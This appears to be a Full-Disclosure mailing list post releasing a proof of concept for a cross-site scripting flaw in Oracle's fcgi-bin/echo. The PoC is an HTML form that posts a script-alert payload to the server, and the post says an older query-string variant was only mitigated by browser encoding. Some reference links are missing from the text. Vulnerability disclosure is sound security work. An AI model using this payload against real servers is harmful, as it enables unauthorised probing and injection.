Long ago, I wrote about an XSS vulnerability in Oracle fcgi-bin/echo :
The issue may now be fixed in the latest versions of Oracle web servers:
So I now release the PoC for this vulnerability:
<form action="http://server/fcgi-bin/echo" method=post enctype="multipart/form-data">
<input type=text name=xss size=50 value="<script>alert('XSS')</script>"><br>
<input type=submit value="send">
The "traditional" form of a similar vulnerability
is claimed to have been fixed long ago, maybe in
However that never was actually fixed by Oracle, but was fixed by
browsers that %-encode the query.
Another interesting reference:
Paul Szabo firstname.lastname@example.org http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/